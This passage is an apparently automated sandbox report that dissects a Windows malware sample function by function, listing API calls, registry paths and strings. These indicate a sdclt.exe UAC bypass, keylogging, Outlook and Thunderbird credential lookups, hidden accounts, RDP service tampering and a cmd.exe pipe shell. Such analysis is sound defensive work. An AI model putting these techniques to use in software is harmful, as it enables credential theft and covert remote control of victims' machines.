                                                • LeaveCriticalSection.KERNEL32(0054E020,00000000,rpdp,0054E080,00000000,rudp,0054E07C,0054E07C,0054E080,?,?), ref: 0040E6C4
                                                • LeaveCriticalSection.KERNEL32(0054E020,00000000,?,?), ref: 0040E6F4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$Leavelstrlen$lstrcpy$CloseCreateDeleteEnterFreeInitializeOpenValueVirtual
                                                • String ID: T$ T$ T$ T$8T$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList$rpdp$rudp$|T$|T$|T
                                                • API String ID: 2046459734-3123880581
                                                • Opcode ID: cd0415c43985efbc87f442af4b777adfe855260c681dc1457212b221c0ff1409
                                                • Instruction ID: 34b65afe6731ba6ecc596c756d3df6cf655f2d54d3c1a9bc6dda8ec2e9e85144
                                                • Opcode Fuzzy Hash: cd0415c43985efbc87f442af4b777adfe855260c681dc1457212b221c0ff1409
                                                • Instruction Fuzzy Hash: BE7185706001147BDB14BF62DC5AEEE7B68BF98318B00443EF519B61D1DF7CAA05CA58
                                                Function 004095AA Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 214windowstringregistryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleA.KERNEL32(00000000), ref: 004095BC
                                                • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 0040962B
                                                • lstrcatW.KERNEL32(-00000010,\Microsoft Vision\), ref: 00409645
                                                • CreateDirectoryW.KERNEL32(-00000010,00000000), ref: 00409651
                                                • lstrcpyW.KERNEL32(?,-00000010), ref: 0040968B
                                                • lstrcatW.KERNEL32(?,00414A58), ref: 0040969E
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                  • Part of subcall function 0040FF27: FindFirstFileW.KERNEL32(?,?,?,?), ref: 0040FF54
                                                • GetLocalTime.KERNEL32(?,00000000,ExplorerIdentifier), ref: 00409721
                                                • wsprintfW.USER32 ref: 00409758
                                                • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000), ref: 0040979A
                                                • CloseHandle.KERNEL32(00000000), ref: 004097AA
                                                • RegisterClassW.USER32 ref: 004097C9
                                                • CreateWindowExW.USER32 ref: 004097E1
                                                • GetMessageA.USER32 ref: 00409802
                                                • TranslateMessage.USER32(?), ref: 00409814
                                                • DispatchMessageA.USER32(?), ref: 0040981F
                                                • GetMessageA.USER32 ref: 0040982F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Message$Create$FileHandlelstrcatlstrcpylstrlen$ClassCloseDirectoryDispatchFindFirstFolderLocalModulePathRegisterTimeTranslateWindowwsprintf
                                                • String ID: %02d-%02d-%02d_%02d.%02d.%02d$ExplorerIdentifier$\Microsoft Vision\
                                                • API String ID: 2678186124-2372768292
                                                • Opcode ID: df6117677810be282a3d8ac22bece896e1c62fdd803549dfb87a757c95bc9f23
                                                • Instruction ID: 39917dbe05b92edb34d852007e222ad395107d7940ebd828c0aa0b94b9005c6a
                                                • Opcode Fuzzy Hash: df6117677810be282a3d8ac22bece896e1c62fdd803549dfb87a757c95bc9f23
                                                • Instruction Fuzzy Hash: B0718CB2504304ABC710DFA5DC49EAB77ECFB89704F00892EF589E6291DA39D944CB69
                                                Function 0040A0D8 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 160registrystringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExW.ADVAPI32 ref: 0040A12F
                                                • RegOpenKeyExW.ADVAPI32 ref: 0040A14C
                                                • lstrcpyW.KERNEL32(?,Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676), ref: 0040A19F
                                                • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A1B5
                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000800,00000000,00000000,00000000,00000000), ref: 0040A1E8
                                                • RegCloseKey.ADVAPI32(?), ref: 0040A1F9
                                                • lstrcpyW.KERNEL32(?,?), ref: 0040A20D
                                                • lstrcatW.KERNEL32(?,00414684), ref: 0040A21B
                                                • lstrcatW.KERNEL32(?,?), ref: 0040A22F
                                                • RegOpenKeyExW.ADVAPI32 ref: 0040A24C
                                                • RegCloseKey.ADVAPI32(?), ref: 0040A261
                                                • RegOpenKeyExW.ADVAPI32 ref: 0040A27E
                                                Strings
                                                • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040A142, 0040A152
                                                • Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040A17C, 0040A181, 0040A191
                                                • Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040A15F, 0040A16F
                                                • Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040A125
                                                • Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040A135
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Open$Closelstrcatlstrcpy$EnumInfoQuery
                                                • String ID: Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                                                • API String ID: 1891545080-2020977430
                                                • Opcode ID: 21372609fb8b59a61b6319a3bad4b110c4e1e25f3d4e01faebfa4960ce8ac778
                                                • Instruction ID: 3b09ce140b779f32128b2b507774cdcec2852ce8a85b0d369bf0fcab4c4bb44c
                                                • Opcode Fuzzy Hash: 21372609fb8b59a61b6319a3bad4b110c4e1e25f3d4e01faebfa4960ce8ac778
                                                • Instruction Fuzzy Hash: C3419DB290021DFEEB21DAA1DC44EFF777CEB04784F1004BAB605F2141E6789E909BA5
                                                Function 00411AB9 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 90sleepregistrystringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040FBFC: GetCurrentProcess.KERNEL32(00000008,00000000,770113FB,00000000,770113FB,00000000,?,?,?,?,00413589,?), ref: 0040FC0E
                                                  • Part of subcall function 0040FBFC: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,00413589,?), ref: 0040FC15
                                                  • Part of subcall function 0040FBFC: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,00413589,?), ref: 0040FC33
                                                  • Part of subcall function 0040FBFC: CloseHandle.KERNEL32(00000000), ref: 0040FC48
                                                • CloseHandle.KERNEL32(?), ref: 00411AD8
                                                • GetCurrentProcess.KERNEL32(?), ref: 00411AE7
                                                • IsWow64Process.KERNEL32(00000000), ref: 00411AEE
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000400), ref: 00411B25
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00411B57
                                                • lstrcatW.KERNEL32(?,\sdclt.exe), ref: 00411B69
                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411B81
                                                • ShellExecuteExW.SHELL32(?), ref: 00411BB3
                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00411BBD
                                                • Sleep.KERNEL32(000007D0), ref: 00411BD5
                                                • RegDeleteKeyA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command), ref: 00411BE5
                                                • ExitProcess.KERNEL32 ref: 00411BEC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CloseCurrentExecuteHandleShellToken$DeleteDirectoryExitFileInformationModuleNameOpenSleepSystemTerminateWow64lstrcat
                                                • String ID: <$@$DelegateExecute$Software\Classes\Folder\shell\open\command$\sdclt.exe$open
                                                • API String ID: 3164795406-2081737068
                                                • Opcode ID: 7ff83f614565ee17c69b90500d796a12987e3902208dd5022d8f515cab05b9c2
                                                • Instruction ID: 72994b68b8d2737cdcda42cc23d7f68f865ca3c4a3f3ee0d868a1c5545f4d225
                                                • Opcode Fuzzy Hash: 7ff83f614565ee17c69b90500d796a12987e3902208dd5022d8f515cab05b9c2
                                                • Instruction Fuzzy Hash: 75317EB1C01118BBDB10ABA1DC48EDEBB7CEF85315F1080B6FA09A2160D7385A85CB68
                                                Function 00408E66 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 147filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetForegroundWindow.USER32 ref: 00408E8F
                                                • GetWindowTextW.USER32(00000000,?,00000104,?,?), ref: 00408EA2
                                                • lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 00408F0B
                                                • lstrcpyW.KERNEL32(-00000210,?), ref: 00408F58
                                                • CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000), ref: 00408F79
                                                • lstrlenW.KERNEL32(00414AD0,00000008,00000000,?,?), ref: 00408FA2
                                                • WriteFile.KERNEL32(?,00414AD0,00000000,?,?), ref: 00408FAE
                                                • WriteFile.KERNEL32(?,?,00000000,-00000008,00000000), ref: 00408FD2
                                                • lstrlenW.KERNEL32(00414AD0,-00000008,00000000,?,?), ref: 00408FE5
                                                • WriteFile.KERNEL32(?,00414AD0,00000000,?,?), ref: 00408FF1
                                                • lstrlenW.KERNEL32(?,00000008,00000000,?,?), ref: 00409003
                                                • WriteFile.KERNEL32(?,?,00000000,?,?), ref: 00409011
                                                • CloseHandle.KERNEL32(?), ref: 0040901B
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                  • Part of subcall function 00403335: lstrcatW.KERNEL32(00000000,770113FB,?,?,00413589,?,00411515,00413589,004135B9,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00413589,00000000,770113FB,00000000), ref: 00403365
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$File$Write$Windowlstrcpy$CloseCreateForegroundFreeHandleTextVirtuallstrcat
                                                • String ID: {Unknown}
                                                • API String ID: 2314120260-4054869793
                                                • Opcode ID: 992d3a07b905f4852690db995bdfd4e03bd76e4fd33253bb5948540b72395d4a
                                                • Instruction ID: 48c8d0e1ccd5ade84659c98120638cea8da37cb0c086f8587c48bb6223624dfa
                                                • Opcode Fuzzy Hash: 992d3a07b905f4852690db995bdfd4e03bd76e4fd33253bb5948540b72395d4a
                                                • Instruction Fuzzy Hash: B4519271A00104AFDB00EF65DC99FDA7BA8EF44344F0580B9F509A72A1DB75AE50CB68
                                                Function 0040EAFB Relevance: 19.6, APIs: 13, Instructions: 135pipethreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040EA89: GetCurrentThreadId.KERNEL32(?,00000000,00402A8C,00000000,exit,00000000,start), ref: 0040EA95
                                                  • Part of subcall function 0040EA89: SetEvent.KERNEL32(00000000), ref: 0040EAA9
                                                  • Part of subcall function 0040EA89: WaitForSingleObject.KERNEL32(0041956C,00001388), ref: 0040EAB6
                                                  • Part of subcall function 0040EA89: TerminateThread.KERNEL32(0041956C,000000FE), ref: 0040EAC7
                                                • CreatePipe.KERNEL32(00000000,00000000,?,00000000,?,?,00000000), ref: 0040EB41
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000001,00000002,?,00000000), ref: 0040EB5E
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 0040EB64
                                                • DuplicateHandle.KERNEL32 ref: 0040EB6D
                                                • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000,?,00000000), ref: 0040EB85
                                                • GetCurrentProcess.KERNEL32(00419560,00000000,00000000,00000002,?,00000000), ref: 0040EB9E
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 0040EBA4
                                                • DuplicateHandle.KERNEL32 ref: 0040EBA7
                                                • GetCurrentProcess.KERNEL32(00419564,00000000,00000000,00000002,?,00000000), ref: 0040EBBC
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 0040EBC2
                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040EC18
                                                • CreateThread.KERNEL32(00000000,00000000,0040E92A,00419558,00000000,00419570), ref: 0040EC38
                                                • DuplicateHandle.KERNEL32 ref: 0040EBC5
                                                  • Part of subcall function 0040EC8C: CloseHandle.KERNEL32(00419568), ref: 0040EC96
                                                  • Part of subcall function 0040362D: lstrcpyW.KERNEL32(00000000,770113FB), ref: 00403657
                                                  • Part of subcall function 0040E891: CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000001,00000010,00000000,00000000,?,00000000), ref: 0040E8E3
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CurrentProcess$Create$Handle$DuplicateThread$EventPipe$CloseObjectSingleTerminateWaitlstrcpy
                                                • String ID:
                                                • API String ID: 337272696-0
                                                • Opcode ID: 17de9e7c98fe341788f9595ed085310b6ea3ebf193b3da8da13d74dd34396210
                                                • Instruction ID: 133df40998d99ecd2617a4aa81dd542fac3e70f3ef78a3e4fdcb16f339e728fe
                                                • Opcode Fuzzy Hash: 17de9e7c98fe341788f9595ed085310b6ea3ebf193b3da8da13d74dd34396210
                                                • Instruction Fuzzy Hash: 5A418471900209BAFB14EBA2CE56FEFBB78AF44745F10443BF501B20D1DB789A15CA69
                                                Function 0040D58D Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 71serviceCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040D5A0
                                                • OpenServiceW.ADVAPI32(00000000,?,00000001), ref: 0040D5B9
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D5C6
                                                • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?), ref: 0040D5D5
                                                • GetLastError.KERNEL32 ref: 0040D5DF
                                                • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?), ref: 0040D600
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D611
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D614
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D624
                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D627
                                                  • Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00411E18,00000000,00000000,00000000,00000000,h\HA,00000000), ref: 0040109F
                                                  • Part of subcall function 00401099: HeapFree.KERNEL32(00000000), ref: 004010A6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$ConfigHeapOpenQuery$ErrorFreeLastManagerProcess
                                                • String ID: ServicesActive
                                                • API String ID: 1929760286-3071072050
                                                • Opcode ID: 988a247054cbab642579a7990b6c39b941216f8cb3b3a6a4e112f645155d845c
                                                • Instruction ID: ebb33121c736b37e022c412f83ca8b13b1641e7c3b3b3a4d2b3b8dbfd97acc73
                                                • Opcode Fuzzy Hash: 988a247054cbab642579a7990b6c39b941216f8cb3b3a6a4e112f645155d845c
                                                • Instruction Fuzzy Hash: 6D119D71900218BBCB109BA2DD48D9F7FADEFC97547114036FA06E3290DB389E01CBA8
                                                Function 0040DED2 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 324COMMON
                                                Download Yara Rule
                                                APIs
                                                • EnterCriticalSection.KERNEL32 ref: 0040DEEF
                                                  • Part of subcall function 0040FC58: GetCurrentProcess.KERNEL32(?,?,00402D84,?,00414648,?,?,00000000,?,?,?), ref: 0040FC5C
                                                • PathFileExistsW.SHLWAPI(?), ref: 0040E099
                                                • PathFileExistsW.SHLWAPI(?), ref: 0040DF0D
                                                  • Part of subcall function 0040FDF0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,00000000,00000000), ref: 0040FE07
                                                  • Part of subcall function 0040FDF0: GetLastError.KERNEL32(?,?,?,00409A69,?,?,?), ref: 0040FE15
                                                • LeaveCriticalSection.KERNEL32(?,00000000), ref: 0040E28C
                                                  • Part of subcall function 0040D9B6: RegOpenKeyExW.ADVAPI32 ref: 0040D9EA
                                                • GetCurrentProcess.KERNEL32(SeDebugPrivilege), ref: 0040E17F
                                                • LeaveCriticalSection.KERNEL32(?,00000000), ref: 0040E2CC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalFileSection$CurrentExistsLeavePathProcess$CreateEnterErrorLastOpen
                                                • String ID: SeDebugPrivilege
                                                • API String ID: 1717069549-2896544425
                                                • Opcode ID: e7ba69e5c4d358e8994fdac3496a4f24137894f42445f22d23cd093ec350b375
                                                • Instruction ID: 6d1121f80526272389c26c227ec0b40347df9dac2dac69921326d16d34c53ede
                                                • Opcode Fuzzy Hash: e7ba69e5c4d358e8994fdac3496a4f24137894f42445f22d23cd093ec350b375
                                                • Instruction Fuzzy Hash: 58B14D71508205ABC714EF62CC91DABB7A8BF94348F00093FB552A31D1DB78EA59CB5A
                                                Function 0040DCB2 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 111registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                • RegOpenKeyExW.ADVAPI32 ref: 0040DCF3
                                                  • Part of subcall function 00410FC3: RegQueryValueExW.ADVAPI32(?,770113FB,00000000,770113FB,00000000,00000000), ref: 00410FE6
                                                  • Part of subcall function 00410FC3: RegQueryValueExW.ADVAPI32(?,770113FB,00000000,770113FB,00000000,00000000), ref: 0041100A
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                  • Part of subcall function 00410FAE: RegCloseKey.KERNEL32(?), ref: 00410FB8
                                                • StrStrW.SHLWAPI(?,svchost.exe), ref: 0040DD57
                                                • StrStrW.SHLWAPI(?,svchost.exe -k), ref: 0040DD65
                                                • RegOpenKeyExW.ADVAPI32 ref: 0040DD82
                                                Strings
                                                • SYSTEM\CurrentControlSet\Services\TermService, xrefs: 0040DCBE
                                                • ImagePath, xrefs: 0040DD05
                                                • svchost.exe -k, xrefs: 0040DD5D
                                                • ServiceDll, xrefs: 0040DD90
                                                • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040DCCE
                                                • svchost.exe, xrefs: 0040DD4F
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: OpenQueryValuelstrlen$CloseFreeVirtuallstrcpy
                                                • String ID: ImagePath$SYSTEM\CurrentControlSet\Services\TermService$SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$svchost.exe$svchost.exe -k
                                                • API String ID: 2246401353-3333427388
                                                • Opcode ID: 3c46e40b44c7150c4bb0a6584e962ef9b7730d40a0ca3a549d9ff2b1885c363a
                                                • Instruction ID: b0e3efee02fd3b5bcb605f8d25d9eb9ad0325da8f8f16e1407df865518f0ff08
                                                • Opcode Fuzzy Hash: 3c46e40b44c7150c4bb0a6584e962ef9b7730d40a0ca3a549d9ff2b1885c363a
                                                • Instruction Fuzzy Hash: 6F410C71D00118ABDF14EBE2CD52EEEB738AF14745F10406BA401B21D1EB78AB45CAA8
                                                Function 00409ADF Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 229fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00409AFC
                                                • GetLastError.KERNEL32 ref: 00409B09
                                                • CloseHandle.KERNEL32(00000000), ref: 00409B10
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00409B1D
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00409B4C
                                                • CloseHandle.KERNEL32(00000000), ref: 00409B53
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseHandle$CreateErrorLastReadSize
                                                • String ID: Password$Password
                                                • API String ID: 1366138817-7788977
                                                • Opcode ID: a83f1898175cc25c3bc8a3f1448733481d8638435ddeddde8ca691726911fd77
                                                • Instruction ID: 104b88514deac065fe8cd1f3a748688661c759891a47cef897251ecb07377383
                                                • Opcode Fuzzy Hash: a83f1898175cc25c3bc8a3f1448733481d8638435ddeddde8ca691726911fd77
                                                • Instruction Fuzzy Hash: 2281E070C082456EFF259BA8D845AAF7FA5AF41318F10807FE4417A2D3CB7D1E428B59
                                                Function 0041273A Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 175comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 0041274C
                                                • CoCreateInstance.OLE32(004145A0,00000000,00000001,00417410,{"A), ref: 00412779
                                                • CoUninitialize.OLE32 ref: 00412902
                                                  • Part of subcall function 00412A6B: CoCreateInstance.OLE32(004145E0,00000000,00000001,004173F0,?), ref: 00412A99
                                                • CoCreateInstance.OLE32(004145F0,00000000,00000001,00417400,?), ref: 004127CA
                                                  • Part of subcall function 004124EB: CoTaskMemFree.OLE32(?), ref: 004124F9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInstance$FreeInitializeTaskUninitialize
                                                • String ID: Grabber$Source$vids${"A
                                                • API String ID: 533512943-829088075
                                                • Opcode ID: b8c9bf1896b8d674ab3dbeb163a760aa6cf87fb7c74c69ea63af9a5f96d6631b
                                                • Instruction ID: f60cba08d0f00ca84645215000878ed329aa95aec1bd6b6a09df8212b68bd471
                                                • Opcode Fuzzy Hash: b8c9bf1896b8d674ab3dbeb163a760aa6cf87fb7c74c69ea63af9a5f96d6631b
                                                • Instruction Fuzzy Hash: 3E516D71A00209AFDB14DFA5C888EEEB7B9EF84304F14856EE905EB250CBB59D41CB64
                                                Function 0040F80E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 130comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040F825
                                                • CoInitialize.OLE32(00000000), ref: 0040F82C
                                                • CoCreateInstance.OLE32(00414490,00000000,00000017,00416E60,?), ref: 0040F84A
                                                • VariantInit.OLEAUT32(?), ref: 0040F8CE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Initialize$CreateInitInstanceSecurityVariant
                                                • String ID: Name$SELECT Name FROM Win32_VideoController$WQL$root\CIMV2
                                                • API String ID: 2382742315-3227336550
                                                • Opcode ID: 403b7e85f719e6cc689add3960bfbdef3a036335b9595bbe9f71e574c8c4bef9
                                                • Instruction ID: 3360bb0e2bdd619f1c1acbb00a5b578425b81bf7c01421450e144227b1317e44
                                                • Opcode Fuzzy Hash: 403b7e85f719e6cc689add3960bfbdef3a036335b9595bbe9f71e574c8c4bef9
                                                • Instruction Fuzzy Hash: 42410875A00209ABCB14DB95CC48EDFBBB8EFC9B04B1484B9F515EB290D774A946CB24
                                                Function 00411F13 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 75sleepprocessmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32(?,00000000,770113FB,00000000), ref: 00411F25
                                                • IsWow64Process.KERNEL32(00000000), ref: 00411F2C
                                                • VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040), ref: 00411F50
                                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 00411F5E
                                                • lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014), ref: 00411F6C
                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00411FA9
                                                • Sleep.KERNEL32(000003E8), ref: 00411FB8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$AllocCreateCurrentDirectorySleepVirtualWindowsWow64lstrlen
                                                • String ID: \System32\cmd.exe
                                                • API String ID: 3151064845-2003734499
                                                • Opcode ID: 559f2bd097435d8a568bcf13c594c8383120a3eb8e261063f6a0de6b71a55955
                                                • Instruction ID: cb044ac8fdf5ef6581503e12c37282ac8c42e3dcda270f9c1544013f8f079b25
                                                • Opcode Fuzzy Hash: 559f2bd097435d8a568bcf13c594c8383120a3eb8e261063f6a0de6b71a55955
                                                • Instruction Fuzzy Hash: 261184F1A00208BFEB10A7B6EC49FEF766CDB44745F104036F705E61A0DA749E458669
                                                Function 0040C118 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 56registrystringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0040C154
                                                • lstrcatW.KERNEL32(?,thunderbird.exe,?,00000104,00000000), ref: 0040C162
                                                • RegOpenKeyExW.ADVAPI32 ref: 0040C17B
